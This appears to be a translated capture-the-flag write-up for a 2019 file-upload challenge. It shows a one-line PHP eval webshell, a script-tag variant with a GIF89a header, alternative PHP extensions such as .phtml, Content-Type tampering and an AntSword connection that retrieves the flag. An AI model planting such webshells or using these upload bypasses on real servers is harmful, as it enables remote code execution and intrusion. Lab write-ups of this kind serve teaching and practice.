当前位置:网站首页>[geek challenge 2019] upload
[geek challenge 2019] upload
2022-07-02 11:59:00 【With stars in your eyes】
After opening, there is a file upload question , First upload a php File try
In a word, the contents of the Trojan horse file are <?php eval($_POST['hhh']);?>
The prompt is not a picture
Preliminary guess is to modify Content-Type, Try to grab a bag
Use burpsuite Grab the bag
But it still shows
Try to modify php suffix
".php" Equivalent extension :
".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml"
The first few failed
But try .phtml when , There's a difference , The contents of the original document cannot include '<?'
Modify the document to <script language="php">eval($_POST['hhh'])</script>, It works the same , But show Dont't lie to me,it's not image at all!!!
Later inquiry , It turns out that you need to write a picture file header , Modify the document to GIF89a? <script language="php">eval($_POST['hhh'])</script>, Upload successful !
Then find the file path , Be in commonly upload In the folder , Try typing , As expected And find the file we uploaded
Then connect it with an ant sword
Successful connection
Find it here flag
Click to enter
边栏推荐
- 深入理解PyTorch中的nn.Embedding
- Yygh-9-make an appointment to place an order
- b格高且好看的代码片段分享图片生成
- PHP 2D and multidimensional arrays are out of order, PHP_ PHP scrambles a simple example of a two-dimensional array and a multi-dimensional array. The shuffle function in PHP can only scramble one-dim
- How to Create a Beautiful Plots in R with Summary Statistics Labels
- HOW TO EASILY CREATE BARPLOTS WITH ERROR BARS IN R
- 动态内存(进阶四)
- Power Spectral Density Estimates Using FFT---MATLAB
- The computer screen is black for no reason, and the brightness cannot be adjusted.
- PgSQL string is converted to array and associated with other tables, which are displayed in the original order after matching and splicing
猜你喜欢
Yygh-9-make an appointment to place an order
BEAUTIFUL GGPLOT VENN DIAGRAM WITH R
6. Introduce you to LED soft film screen. LED soft film screen size | price | installation | application
Natural language processing series (II) -- building character level language model using RNN
HOW TO CREATE A BEAUTIFUL INTERACTIVE HEATMAP IN R
Dynamic debugging of multi file program x32dbg
excel表格中选中单元格出现十字带阴影的选中效果
GGHIGHLIGHT: EASY WAY TO HIGHLIGHT A GGPLOT IN R
Three transparent LED displays that were "crowded" in 2022
H5, add a mask layer to the page, which is similar to clicking the upper right corner to open it in the browser
随机推荐
HOW TO ADD P-VALUES ONTO A GROUPED GGPLOT USING THE GGPUBR R PACKAGE
HOW TO CREATE A BEAUTIFUL INTERACTIVE HEATMAP IN R
深入理解PyTorch中的nn.Embedding
[visual studio 2019] create and import cmake project
PyTorch搭建LSTM实现服装分类(FashionMNIST)
From scratch, develop a web office suite (3): mouse events
PyTorch中repeat、tile与repeat_interleave的区别
ESP32音频框架 ESP-ADF 添加按键外设流程代码跟踪
可昇級合約的原理-DelegateCall
Mmrotate rotation target detection framework usage record
The computer screen is black for no reason, and the brightness cannot be adjusted.
ORB-SLAM2不同线程间的数据共享与传递
Data analysis - Matplotlib sample code
MySQL comparison operator in problem solving
自然语言处理系列(三)——LSTM
SVO2系列之深度滤波DepthFilter
Principe du contrat évolutif - delegatecall
MySQL stored procedure cursor traversal result set
Power Spectral Density Estimates Using FFT---MATLAB
小程序链接生成